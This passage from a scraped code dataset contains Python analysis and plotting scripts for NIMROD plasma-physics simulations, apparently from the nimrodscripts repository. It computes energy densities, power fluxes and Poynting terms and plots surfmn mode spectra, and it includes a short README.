perturbation\n self.fielddict['vpert']=fc.Vector(field,rzp,self.vdmode,True)\n if fft:\n self.fielddict['vfour']=self.fft(field,type='v')\n return None\n\n @timer.timer_func\n def eval_b(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.beq or self.be0:\n if len(rzp.shape)==2:\n field=self.eval_symm('b',rzp,dmode=self.bdmode,eq=1)\n self.fielddict['beq']=fc.Vector(field,rzp,self.bdmode,True)\n else:\n field=self.eval.eval_field('b',grid,dmode=self.bdmode,eq=1)\n self.fielddict['beq']=fc.Vector(field,rzp,self.bdmode,True)\n if self.be0:\n if len(rzp.shape)==2:\n field2=self.eval_symm('b',rzp,dmode=self.bdmode,eq=3)\n field2=field2-field #sutract eq\n self.fielddict['be0']=fc.Vector(field2,rzp,self.bdmode,True)\n else:\n field2=self.eval.eval_field('b', grid, dmode=self.bdmode, eq=3)\n field2=field2-field #subtract eq\n self.fielddict['be0']=fc.Vector(field2,rzp,self.bdmode,True)\n if self.bpert:\n field=self.eval.eval_field('b',grid,dmode=self.bdmode, eq=0)\n if self.be0:\n field=field-field2 #subtract n=0 perturbation\n self.fielddict['bpert']=fc.Vector(field,rzp,self.bdmode,True)\n if fft:\n self.fielddict['bfour']=self.fft(field,type='v')\n return None\n\n @timer.timer_func\n def eval_fsa_beq2(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n self.dump_fsa_beq2 =self.output_nml.get('dump_fsa_beq2',False)\n if self.dump_fsa_beq2:\n if len(rzp.shape)==2:\n field=self.eval_symm('fsa_beq2', grid, dmode=1, eq=1)\n self.fielddict['fsa_beq2']=fc.Scalar(field,rzp,1,True)\n else:\n field=self.eval.eval_field('fsa_beq2', grid, dmode=1, eq=1)\n self.fielddict['fsa_beq2']=fc.Scalar(field,rzp,1,True)\n else:\n self.fielddict['fsa_beq2']=0.0\n return None\n\n @timer.timer_func\n def eval_j(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.jeq or self.je0:\n if len(rzp.shape)==2:\n field=self.eval_symm('j',rzp,dmode=self.jdmode,eq=1)\n self.fielddict['jeq']=fc.Vector(field,rzp,self.jdmode,True)\n else:\n field=self.eval.eval_field('j', grid, dmode=self.jdmode, eq=1)\n self.fielddict['jeq']=fc.Vector(field,rzp,self.jdmode,True)\n if self.je0:\n if len(rzp.shape)==2:\n field2=self.eval_symm('j',rzp,dmode=self.jdmode,eq=3)\n field2=field2-field #sutract eq\n self.fielddict['je0']=fc.Vector(field2,rzp,self.jdmode,True)\n else:\n field2=self.eval.eval_field('j', grid, dmode=self.jdmode, eq=3)\n field2=field2-field #subtract 
eq\n self.fielddict['je0']=fc.Vector(field2,rzp,self.jdmode,True)\n if self.jpert:\n field=self.eval.eval_field('j', grid, dmode=self.jdmode, eq=0)\n if self.je0:\n field=field-field2\n self.fielddict['jpert']=fc.Vector(field,rzp,self.jdmode,True)\n if fft:\n self.fielddict['jfour']=self.fft(field,type='v')\n return None\n\n @timer.timer_func\n def eval_neo_mask(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n r0=self.closure_nml.get('neo_axis_r',0)\n z0=self.closure_nml.get('neo_axis_z',0)\n rbump=self.closure_nml.get('neo_bump_r0',1.0)\n shape=list(rzp.shape)\n shape[0]=4\n fval=np.zeros(shape)\n fval[0]=1.0\n r2=(np.power(rzp[0]-r0,2)+np.power(rzp[1]-z0,2))/rbump**2\n if isinstance(r2,np.float):\n if r2<1.0:\n #check\n bump=np.exp(1-1./(1.-r2))\n dbumpdr2=-r2/(1-r2)**3\n dr2dx=2*(rzp[0]-r0)/rbump**2\n dr2dz=2*(rzp[1]-r0)/rbump**2\n d2r2dxx=2/rbump**2\n d2r2dyy=2/rbump**2\n d2r2dxy=0.0\n #print(type(bump),type(dbumpdr2),type(dr2dx))\n #print(dbumpdr2.shape)\n fval[0]=1.0-bump\n fval[1]=-bump*dbumpdr2*dr2dx\n fval[2]=-bump*dbumpdr2*dr2dz\n else:\n result=np.where(r2<1.0)\n for indicies in zip(*result):\n #check\n bump=np.exp(1-1./(1.-r2[indicies]))\n dbumpdr2=-r2[indicies]/(1-r2[indicies])**3\n dr2dx=2*(rzp[(0,)+indicies]-r0)/rbump**2\n dr2dz=2*(rzp[(1,)+indicies]-r0)/rbump**2\n d2r2dxx=2/rbump**2\n d2r2dyy=2/rbump**2\n d2r2dxy=0.0\n #print(type(bump),type(dbumpdr2),type(dr2dx))\n #print(dbumpdr2.shape)\n fval[(0,)+indicies]=1.0-bump\n fval[(1,)+indicies]=-bump*dbumpdr2*dr2dx\n fval[(2,)+indicies]=-bump*dbumpdr2*dr2dz\n return fc.Scalar(fval,rzp,1,True)\n\n @timer.timer_func\n def eval_p(self,grid=None,fft=False):\n grid,rzp=self.get_gridrzp(grid)\n if self.peq or self.p0:\n if len(rzp.shape)==2:\n field=self.eval_symm('p',rzp,dmode=self.pdmode,eq=1)\n self.fielddict['peq']=fc.Scalar(field,rzp,self.pdmode,True)\n else:\n field=self.eval.eval_field('p',grid,dmode=self.pdmode,eq=1)\n self.fielddict['peq']=fc.Scalar(field,rzp,self.pdmode,True)\n if self.p0:\n if len(rzp.shape)==2:\n field2=self.eval_symm('p',rzp,dmode=self.pdmode,eq=3)\n field2=field2-field #sutract eq\n self.fielddict['p0']=fc.Scalar(field2,rzp,self.pdmode,True)\n else:\n field2=self.eval.eval_field('p', grid, dmode=self.pdmode, eq=3)\n field2=field2-field #subtract eq\n self.fielddict['p0']=fc.Scalar(field2,rzp,self.pdmode,True)\n if self.ppert:\n field=self.eval.eval_field('p',grid,dmode=self.pdmode,eq=0)\n if self.p0:\n field=field-field2 #remove n=0 perturbation\n self.fielddict['ppert']=fc.Scalar(field,rzp,self.pdmode,True)\n if fft:\n self.fielddict['pfour']=self.fft(field,type='s')\n return None\n\n\n @timer.timer_func\n def eval_diff(self,grid=None):\n ''' Get the diff shape scalars from eval nimrod\n Some extralogic is needed to pull apart the different\n diff shape scalar fields from the output of eval_field\n note when ds_nqty>1\n elecd_diff is 0\n iso_visc_diff is 1\n '''\n diff_dmode=self.diff_dmode\n grid,rzp=self.get_gridrzp(grid)\n self.ds_nqty = self.equil_nml.get('ds_nqty',1)\n if len(rzp.shape)==2:\n field=self.eval_symm('d',rzp,dmode=diff_dmode,eq=1)\n else:\n field=self.eval.eval_field('d',grid,dmode=diff_dmode, eq=1)\n diff_shape=[]\n ishape=list(field.shape)\n ishape[0]=ishape[0]//self.ds_nqty\n ifield= np.zeros(ishape)\n for ii in range(self.ds_nqty):\n ifield[0] = field[ii]\n if diff_dmode>0:\n start=self.ds_nqty+ii*3\n end=start+3\n ifield[1:4]=field[start:end]\n if diff_dmode>1:\n start=self.ds_nqty*4+ii*6\n end=start+6\n ifield[4:10]=field[start:end]\n 
diff_shape.append(fc.Scalar(ifield,rzp,diff_dmode,True))\n self.fielddict['diff_shape']=diff_shape\n return None\n\n @timer.timer_func\n def calculateFilter(self,grid=None,cutoff=300):\n grid,rzp=self.get_gridrzp(grid)\n if 'diff_shape' not in self.fielddict:\n self.eval_diff(grid)\n if 'jeq' not in self.fielddict:\n self.eval_j(grid,fft=True)\n nfour=self.fielddict['jfour'].shape[-1]\n temp = np.nan_to_num(self.fielddict['diff_shape'][0].data[...,:nfour])\n self.filter = np.where((temp < cutoff) & (temp > 0), 1., 0.)\n\n @timer.timer_func\n def energyDensity(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n if 'veq' not in self.fielddict:\n self.eval_v(grid,fft=True)\n if 'beq' not in self.fielddict:\n self.eval_b(grid,fft=True)\n if 'neq' not in self.fielddict:\n self.eval_n(grid,fft=False)\n\n bTempP=self.fielddict['bfour']\n fac=1./(self.mu0)\n bpert=fac*np.sum(bTempP[0:3]*np.conjugate(bTempP[0:3]),axis=0,where=~np.isnan(bTempP[0:3]))\n bpert[...,0]=bpert[...,0]/2.0\n self.energyDict['bpert']=bpert\n fac=fac/2\n bTempE=self.fielddict['beq'].data[...,0]\n beq=fac*np.sum(bTempE[0:3]*np.conjugate(bTempE[0:3]),axis=0,where=~np.isnan(bTempE[0:3]))\n self.energyDict['beq']=beq\n bTempZ=bTempE+self.fielddict['be0'].data[...,0]\n be0=fac*np.sum(bTempZ[0:3]*np.conjugate(bTempZ[0:3]),axis=0,where=~np.isnan(bTempZ[0:3]))\n self.energyDict['be0']=be0\n\n vTempP=self.fielddict['vfour']\n nfour=vTempP.shape[-1]\n vTempE=self.fielddict['veq'].data[...,:nfour]\n vTempZ=vTempE[0:3,...,0]+self.fielddict['vfour'][0:3,...,0]\n nTempE=self.fielddict['neq'].data[...,:nfour]\n\n fac=self.mi\n vpert=fac*np.sum(vTempP[0:3]*np.conjugate(vTempP[0:3]),axis=0,where=~np.isnan(bTempP[0:3]))\n vpert=np.multiply(nTempE,vpert,out=vpert,where=~np.isnan(nTempE))\n vpert[...,0]=vpert[...,0]/2.0\n self.energyDict['vpert']=vpert\n\n veq=fac*np.sum(vTempE[0:3,...,0]*np.conjugate(vTempE[0:3,...,0]),axis=0,where=~np.isnan(vTempE[0:3,...,0]))\n veq=np.multiply(nTempE[...,0],veq,out=veq,where=~np.isnan(nTempE[...,0]))\n veq=veq/2.0\n self.energyDict['veq']=veq\n\n return\n\n @timer.timer_func\n def calculate_viscositiy(self,grid=None):\n ''' Calculate the divergence of the ion viscous stress tensor '''\n grid,rzp=self.get_gridrzp(grid)\n if 'veq' not in self.fielddict:\n self.eval_v(grid,fft=True)\n iso_visc = self.physics_nml.get('iso_visc',0.0)\n if isinstance(iso_visc,(np.ndarray,list)):\n iso_visc=iso_visc[0]\n ndens = self.equil_nml.get('ndens',1.e20)\n mtot = self.mtot\n if iso_visc > 0:\n visc_fac = -1.0 * mtot * ndens * iso_visc * \\\n self.fielddict['diff_shape'][1]\n pi_tensor = self.fielddict['vpert'].grad() + \\\n self.fielddict['vpert'].grad().transpose() - \\\n 2./3. 
* fc.eye(rzp) * self.fielddict['vpert'].div()\n pi_tensor *= visc_fac\n return pi_tensor.div()\n else:\n return None\n\n @timer.timer_func\n def calculate_neo_div_pi(self,grid=None):\n 'calculates div Pi_i and 1/ne div Pi_e'\n grid,rzp=self.get_gridrzp(grid)\n if 'fsa_beq2' not in self.fielddict:\n self.eval_fsa_beq2(grid)\n mu_i=self.closure_nml.get('mu_i',0.0)\n mu_e=self.closure_nml.get('mu_e',0.0)\n beq=self.fielddict['beq']\n neq=self.fielddict['neq']\n fsa_beq2=self.fielddict['fsa_beq2']\n jpert=self.fielddict['jpert']\n vpert=self.fielddict['vpert']\n ephi=[0,0,1]\n etor=fc.basis_vector('p',rzp,torgeom=True)\n bep=beq-beq.dot(etor)*etor\n\n neo_mask=self.eval_neo_mask(grid)\n work_vec = neo_mask * fsa_beq2 /(beq.dot(bep)**2+1.0e-8) * bep\n\n #ecoef=self.mi*mu_i*neo_mask\n ifac = self.mi * mu_i\n efac =-self.me * mu_e / (self.qe**2)\n div_pi_i = ifac * neq * vpert.dot(bep) * work_vec\n div_pi_e = efac / neq * jpert.dot(bep) * work_vec\n self.fielddict['ndivPiipert'] = div_pi_i\n self.fielddict['ndivPiepert'] = div_pi_e\n\n\n @timer.timer_func\n def calculate_E(self,grid=None):\n ''' Calculate the electric field and the Curl of E for the Poynting Flux\n '''\n grid,rzp=self.get_gridrzp(grid)\n\n v_vec = self.fielddict['veq'] + self.fielddict['ve0'] + \\\n self.fielddict['vpert']\n b_vec = self.fielddict['beq'] + self.fielddict['be0'] + \\\n self.fielddict['bpert']\n\n j_vec = self.fielddict['jpert'] # ONLY N!= IS needed\n\n div_pi_term = self.fielddict['ndivPiepert']\n\n Efield = - v_vec.cross(b_vec) \\\n + self.mu0 * self.elecd * j_vec - div_pi_term\n\n self.fielddict['epert'] = Efield\n\n self.fielddict['edis'] = self.mu0 * self.elecd * j_vec - div_pi_term\n self.fielddict['elin'] = - self.fielddict['veq'].cross(\n self.fielddict['bpert']) - \\\n self.fielddict['vpert'].cross(\n self.fielddict['beq'])\n self.fielddict['eqln'] = - self.fielddict['ve0'].cross(\n self.fielddict['bpert']) - \\\n self.fielddict['vpert'].cross(\n self.fielddict['be0'])\n\n self.fielddict['enon'] = - self.fielddict['vpert'].cross(\n self.fielddict['bpert'])\n\n return None\n\n @timer.timer_func\n def dotPlusCc(self,field1,field2):\n #first check dims\n if field1.shape!=field2.shape:\n print(\"array dimensions dont match\")\n raise ValueError\n fshape=field1.shape[1:]\n result=np.zeros(fshape,dtype=complex)\n for ii in range(fshape[-1]):\n result[...,ii]=np.sum(field1[...,ii]*np.conj(field2[...,ii]) ,axis=0)\n if ii != 0:\n result[...,ii]+=np.conj(result[...,ii])\n return np.nan_to_num(np.real(result))\n\n @timer.timer_func\n def powerFlux(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n if 'veq' not in self.fielddict:\n self.eval_v(grid,fft=True)\n if 'beq' not in self.fielddict:\n self.eval_b(grid,fft=True)\n if 'neq' not in self.fielddict:\n self.eval_n(grid,fft=False)\n if 'jeq' not in self.fielddict:\n self.eval_j(grid,fft=True)\n if 'peq' not in self.fielddict:\n self.eval_p(grid,fft=False)\n if 'diff_shape' not in self.fielddict:\n self.eval_diff(grid)\n\n ohmslaw=self.physics_nml.get('ohms','mhd')\n neoe_flag = self.closure_nml.get('neoe_flag',None)\n mu_e=self.closure_nml.get('mu_e',0.0)\n try:\n self.elecd=self.physics_nml.get('elecd',0.0)\n if isinstance(self.elecd,(np.ndarray,list)):\n self.elecd=self.elecd[0]\n except:\n print(\"Can't read elecd from nimrod.in\")\n raise KeyError\n self.calculate_neo_div_pi(grid=grid)\n self.calculate_E(grid=grid)\n\n jeq_cross_bpert = self.fielddict['jeq'].cross(self.fielddict['bpert'],dmod=0)\n jpert_cross_beq = 
self.fielddict['jpert'].cross(self.fielddict['beq'],dmod=0)\n j0_cross_bpert = self.fielddict['je0'].cross(self.fielddict['bpert'],dmod=0)\n jpert_cross_b0 = self.fielddict['jpert'].cross(self.fielddict['be0'],dmod=0)\n jpert_cross_bpert =self.fielddict['jpert'].cross(self.fielddict['bpert'],dmod=0)\n\n j_cross_b_eq = self.fft(jeq_cross_bpert+jpert_cross_beq)\n j_cross_b_n0 = self.fft(j0_cross_bpert+jpert_cross_b0)\n j_cross_b_pert = self.fft(jpert_cross_bpert)\n\n veq_cross_bpert = self.fielddict['veq'].cross(self.fielddict['bpert'],dmod=0)\n vpert_cross_beq = self.fielddict['vpert'].cross(self.fielddict['beq'],dmod=0)\n v0_cross_bpert = self.fielddict['ve0'].cross(self.fielddict['bpert'],dmod=0)\n vpert_cross_b0 = self.fielddict['vpert'].cross(self.fielddict['be0'],dmod=0)\n vpert_cross_bpert = self.fielddict['vpert'].cross(self.fielddict['bpert'],dmod=0)\n\n v_cross_b_eq = self.fft(veq_cross_bpert+vpert_cross_beq)\n v_cross_b_n0 = self.fft(v0_cross_bpert+vpert_cross_b0)\n v_cross_b_pert = self.fft(vpert_cross_bpert)\n\n fac=1.0 #fac should be one, keep as 2 for convergence testing\n self.powerFluxDict['vxbeq'] = fac * \\\n self.dotPlusCc(v_cross_b_eq,self.fielddict['jfour'][0:3])\n self.powerFluxDict['vxbn0'] = fac * \\\n self.dotPlusCc(v_cross_b_n0,self.fielddict['jfour'][0:3])\n self.powerFluxDict['vxbp'] = fac * \\\n self.dotPlusCc(v_cross_b_pert,self.fielddict['jfour'][0:3])\n\n fac=-1.0\n nfour=self.fielddict['jfour'].shape[-1]\n diff_elecd = np.nan_to_num(self.fielddict['diff_shape'][0].data[...,:nfour])\n self.powerFluxDict['etajp'] = fac * \\\n self.mu0 * self.elecd * diff_elecd * \\\n self.dotPlusCc(self.fielddict['jfour'][0:3],\n self.fielddict['jfour'][0:3])\n\n fac=1.0\n div_pie_pert = self.fft(self.fielddict['ndivPiepert']) #div Pi_e /ne\n self.powerFluxDict['divPie'] =fac * \\\n self.dotPlusCc(div_pie_pert,self.fielddict['jfour'][0:3])\n\n\n fac=1.0 #fac should be one, keep as 2 for convergence testing\n self.powerFluxDict['jxbeq'] = fac * \\\n self.dotPlusCc(j_cross_b_eq,self.fielddict['vfour'][0:3])\n self.powerFluxDict['jxbn0'] = fac * \\\n self.dotPlusCc(j_cross_b_n0,self.fielddict['vfour'][0:3])\n self.powerFluxDict['jxbp'] = fac * \\\n self.dotPlusCc(j_cross_b_pert,self.fielddict['vfour'][0:3])\n\n gradp_pert = self.fft(self.fielddict['ppert'].grad(dmod=0))\n fac = -1.0 #I think fac should be -1, keep as 2 for convergence testing\n self.powerFluxDict['ngpp'] = fac * \\\n self.dotPlusCc(gradp_pert,self.fielddict['vfour'][0:3])\n\n div_pi = self.calculate_viscositiy(grid=grid)\n fac = - 1.0\n if div_pi is not None:\n div_pi_pert = self.fft(div_pi)\n self.powerFluxDict['divpip'] = fac * \\\n self.dotPlusCc(div_pi_pert,self.fielddict['vfour'][0:3])\n\n fac= -1.0\n div_pii_pert = self.fft(self.fielddict['ndivPiipert'])\n self.powerFluxDict['divPii'] =fac * \\\n self.dotPlusCc(div_pii_pert,self.fielddict['vfour'][0:3])\n\n eFour = self.fft(self.fielddict['epert'],type='v')\n curlEFour = self.fft(self.fielddict['epert'].curl(dmod=0),type='v')\n\n fac1 = -1.0/self.mu0\n fac2 = 1.0\n self.powerFluxDict['poynting'] = fac1 * \\\n self.dotPlusCc(self.fielddict['bfour'][0:3],curlEFour[0:3]) + \\\n fac2 * self.dotPlusCc(eFour[0:3],self.fielddict['jfour'][0:3])\n\n if \"edis\" in self.fielddict:\n eFour = self.fft(self.fielddict['edis'],type='v')\n curlEFour = self.fft(self.fielddict['edis'].curl(dmod=0),type='v')\n self.powerFluxDict['poyndis'] = fac1 * \\\n self.dotPlusCc(self.fielddict['bfour'][0:3],curlEFour[0:3]) + \\\n fac2 * 
self.dotPlusCc(eFour[0:3],self.fielddict['jfour'][0:3])\n\n if \"elin\" in self.fielddict:\n eFour = self.fft(self.fielddict['elin'],type='v')\n curlEFour = self.fft(self.fielddict['elin'].curl(dmod=0),type='v')\n self.powerFluxDict['poynlin'] = fac1 * \\\n self.dotPlusCc(self.fielddict['bfour'][0:3],curlEFour[0:3]) + \\\n fac2 * self.dotPlusCc(eFour[0:3],self.fielddict['jfour'][0:3])\n\n if \"eqln\" in self.fielddict:\n eFour = self.fft(self.fielddict['eqln'],type='v')\n curlEFour = self.fft(self.fielddict['eqln'].curl(dmod=0),type='v')\n self.powerFluxDict['poynqln'] = fac1 * \\\n self.dotPlusCc(self.fielddict['bfour'][0:3],curlEFour[0:3]) + \\\n fac2 * self.dotPlusCc(eFour[0:3],self.fielddict['jfour'][0:3])\n\n if \"enon\" in self.fielddict:\n eFour = self.fft(self.fielddict['enon'],type='v')\n curlEFour = self.fft(self.fielddict['enon'].curl(dmod=0),type='v')\n self.powerFluxDict['poynnon'] = fac1 * \\\n self.dotPlusCc(self.fielddict['bfour'][0:3],curlEFour[0:3]) + \\\n fac2 * self.dotPlusCc(eFour[0:3],self.fielddict['jfour'][0:3])\n\n @timer.timer_func\n def advectPowerFlux(self,grid=None):\n grid,rzp=self.get_gridrzp(grid)\n if 'veq' not in self.fielddict:\n self.eval_v(grid,fft=True)\n if 'neq' not in self.fielddict:\n self.eval_n(grid,fft=False)\n\n gradveq = self.fielddict['veq'].grad()\n gradve0 = self.fielddict['ve0'].grad()\n gradvp = self.fielddict['vpert'].grad()\n\n veq_dot_gradvp =self.fielddict['veq'].dot(gradvp)\n ve0_dot_gradvp =self.fielddict['ve0'].dot(gradvp)\n vp_dot_gradveq =self.fielddict['vpert'].dot(gradveq)\n vp_dot_gradve0 =self.fielddict['vpert'].dot(gradve0)\n vp_dot_gradvp =self.fielddict['vpert'].dot(gradvp)\n\n\n neq_v_dot_grad_v_eq = self.fft(self.fielddict['neq'] * \\\n (veq_dot_gradvp + vp_dot_gradveq) )\n\n neq_v_dot_grad_v_n0 = self.fft(self.fielddict['neq'] * \\\n (ve0_dot_gradvp + vp_dot_gradve0) )\n neq_v_dot_grad_v_p = self.fft(self.fielddict['neq'] * vp_dot_gradvp )\n\n fac = -1.0 * self.mi\n self.advectDict['rhovdveq'] = fac * \\\n self.dotPlusCc(neq_v_dot_grad_v_eq,self.fielddict['vfour'][0:3])\n\n self.advectDict['rhovdvn0'] = fac * \\\n self.dotPlusCc(neq_v_dot_grad_v_n0 ,self.fielddict['vfour'][0:3])\n\n self.advectDict['rhovdvp'] = fac * \\\n self.dotPlusCc(neq_v_dot_grad_v_p,self.fielddict['vfour'][0:3])\n\n @timer.timer_func\n def clean_up(self):\n for key, field in self.fielddict.items():\n field = None\n self.fielddict={}\n for key, field in self.energyDict.items():\n field = None\n self.energyDict={}\n for key, field in self.powerFluxDict.items():\n field = None\n self.powerFluxDict={}\n for key, field in self.advectDict.items():\n field = None\n self.advectDict={}\n self.filter = None\n self.eval=None\n self.grid=None\n\n @timer.timer_func\n def clean_up_fsa(self):\n for key, field in self.fielddict.items():\n field = None\n self.fielddict={}\n #for key, field in self.energyDict.items():\n # field = None\n #self.energyDict={}\n for key, field in self.powerFluxDict.items():\n field = None\n self.powerFluxDict={}\n for key, field in self.advectDict.items():\n field = None\n self.advectDict={}\n self.grid=None\n" }, { "alpha_fraction": 0.7163265347480774, "alphanum_fraction": 0.718367338180542, "avg_line_length": 36.769229888916016, "blob_id": "7ddfbc4cc28644d3ecf629cc17319e61ff02294a", "content_id": "93c6b744bfbd41cfac70f6b5514180a95d14b704", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 490, "license_type": "no_license", "max_line_length": 85, "num_lines": 13, "path": 
"/plotingScripts/README.md", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "## plotingScripts\nThis directory contains a collection of scripts for plotting NIMROD output in python\n\n### Scripts\n - **eqInputPlts.py:** Plots the fields in eq_input files\n - **freeBdryPlts.py:** Plots the output generated by in free boundary GS solves.\n - **footPointPlot.py:** Plots the magnetic footpoint on the DIII-D lower divertor. \n \n### Todo\n - [ ] Clean up scripts\n - [ ] Improve documentation\n - [ ] Convert to python 3\n - [ ] Continue to add my random assortment of scripts" }, { "alpha_fraction": 0.6155505776405334, "alphanum_fraction": 0.6265168786048889, "avg_line_length": 32.011871337890625, "blob_id": "843ac05d4714b062bbda18dc5901ed5fb325d461", "content_id": "957c5f24e52246d1869b8e0d036d720db8ae607d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11125, "license_type": "no_license", "max_line_length": 88, "num_lines": 337, "path": "/surfmn/surfmnstep.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#surfmnstep is a container class for storing data useful for analyzing surfmn\n#data\n#\n#\nimport h5py\nimport numpy as np\nimport scipy.interpolate as interp\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nimport pickle\nimport profiles as pf\n\nclass SurfmnStep:\n def __init__(self,surfmn_file,dumpfile,stepnumber,steptime,nimrodin):\n self.surfmn_file=surfmn_file\n self.dumpfile=dumpfile\n self.step=stepnumber\n self.time=steptime\n self.nimrodin=nimrodin\n self.profdata=False\n self.profs=None\n self.mmax=None\n self.surfmn_data=False #set to true surfmn file has been read\n self.nlist=[]\n self.ndict={}\n self.bmnlist=[]\n self.psimnlist=[]\n self.rho = np.empty([1]) #this is a fsa r\n self.vprime = np.empty([1])\n self.q = np.empty([1])\n self.mr=np.empty([1])\n self.psi_q = np.empty([1])\n self.qmin=np.empty([1])\n self.qmax=np.empty([1])\n def get_m_index(self,m):\n '''Return the index for the given m\n Return None if m is out of range'''\n if self.mmax==None:\n write(\"mmax has not be set in get_m_index\")\n raise\n else:\n if m>self.mmax:\n return None\n elif m<-1*self.mmax:\n return None\n else:\n return m+self.mmax\n def read_surfmn(self):\n '''Reads a surfmn h5 file\n Stores profiles in np.arrays\n Calculates psimn from bmn\n sets mmax (no consistancy checks across bmn)\n '''\n index=0\n with h5py.File(self.surfmn_file,'r') as fc:\n self.surfmn_data=True\n self.rho = np.array(fc['rho'][:])\n profs = fc['prof'][:]\n self.vprime = -1.0*np.array(profs[0])\n self.q = np.array(profs[1])\n self.mr=np.array(fc['surfmnGrid'][:])\n self.psi_q = interp.interp1d(self.q,self.rho)\n self.qmin=np.amin(self.q)\n self.qmax=np.amax(self.q)\n for key in fc.keys():\n if key.startswith(\"Bmn\"):\n self.nlist.append(int(key[3:]))\n self.ndict[int(key[3:])]=index\n index+=1\n thisbmn=np.array(fc[key][:])\n if not(self.mmax):\n self.mmax=int((thisbmn.shape[1]-1)/2)\n self.bmnlist.append(thisbmn)\n thispsi=thisbmn\n for ix,iv in enumerate(self.vprime):\n thispsi[ix,:]=iv*thispsi[ix,:]\n self.psimnlist.append(thispsi)\n if not(self.surfmn_data):\n print(\"Can not read surfmn file in read_surfmn\")\n raise\n def plot_surfmn(self,field,nn,**kwargs): #(*args,**kwargs)\n ''' To do, I want to clean up the api'''\n# make sure surfmn has been read and preform a consistancy check\n# on the input\n if nn<1:\n print(\"nn must be positive by convention in 
plot_surfmn\")\n raise ValueError\n if not(self.surfmn_data):\n self.read_surfmn()\n ndex=self.ndict[nn]\n showplot=False\n# Create a new figure if an axis object is not included in kwargs\n if 'axis' in kwargs:\n ax = kwargs['axis']\n else:\n showplot=True\n if 'figsize' in kwargs:\n fig = plt.figure(figsize=kwargs['figsize'])\n else:\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n# Determine which field to plot and set titles and labels\n if (field=='b'):\n fmn=np.copy(self.bmnlist[ndex])\n title=f\"$b$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n elif (field=='psi'):\n fmn=np.copy(self.psimnlist[ndex])\n title=f\"$\\psi$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n if \"scale\" in kwargs:\n fmn*=kwargs[\"scale\"]\n# set contour levels, i could generalize this further if needed\n levels=kwargs.get(\"levels\",301)\n vmax=kwargs.get(\"vmax\",np.amax(fmn))\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n# Update plot based on keys in kwargs\n title=kwargs.get(\"title\",title)\n ylabel=kwargs.get(\"ylabel\",r'<r> [m]')#todo this should be rho\n xlabel=kwargs.get(\"xlabel\",\"Poloidal Mode number m\")\n fontsize=kwargs.get(\"fontsize\",16)\n showplot=kwargs.get(\"plot\",showplot) #orverides showplot logic\n# set up mrange()\n mrange=np.linspace(self.qmin,self.qmax)\n#create the surfmn plot\n plt.set_cmap('nipy_spectral')\n conf=plt.contourf(self.mr[0,:,:],self.mr[1,:,:],fmn,levels=levels,vmax=vmax)\n plt.plot(nn*mrange,self.psi_q(mrange),c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'<r>',fontsize=fontsize)\n plt.xlabel('m',fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n if showplot:\n plt.show()\n\n # Do awesome stuff\n def plot_radial(self,field,nn,mlist,**kwargs):\n ''' To do, I want to clean up the api'''\n if not(self.surfmn_data):\n self.read_surfmn()\n if nn<1:\n print(\"nn must be positive by convention in plot_radial\")\n raise ValueError\n ndex=self.ndict[nn]\n showplot=False\n# Create a new figure if an axis object is not included in kwargs\n if 'axis' in kwargs:\n ax = kwargs['axis']\n else:\n showplot=True\n if 'figsize' in kwargs:\n fig = plt.figure(figsize=kwargs['figsize'])\n else:\n fig = plt.figure(figsize=(6,5))\n ax=fig.add_subplot(111)\n if (field=='b'):\n fmn=np.copy(self.bmnlist[ndex])\n title=f\"$b_m$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n ylable=\"b\"\n elif (field=='psi'):\n fmn=np.copy(self.psimnlist[ndex])\n title=f\"$\\psi_m$ for n={int(nn)} at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi$\"\n if \"scale\" in kwargs:\n fmn*=kwargs[\"scale\"]\n colorlist = list(mcolors.TABLEAU_COLORS)\n# Update plot based on keys in kwargs\n title=kwargs.get(\"title\",title)\n ylabel=kwargs.get(\"ylabel\",ylabel)#todo this should be rho\n xlabel=kwargs.get(\"xlabel\",r'<r> [m]')\n fontsize=kwargs.get(\"fontsize\",16)\n showplot=kwargs.get(\"plot\",showplot) #orverides showplot logic\n qlist=kwargs.get(\"qlist\",[])\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(this_m)\n tc=colorlist[im]\n ax.plot(self.mr[1,:,1],fmn[:,this_i], color=tc, label=mlbl)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.psi_q(qq)\n qlbl = f\"q = {qq:.2f}\"\n tc=colorlist[iq]\n ax.axvline(irho,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0)\n plt.title(title)\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n plt.tight_layout()\n if showplot:\n plt.show()\n\n def 
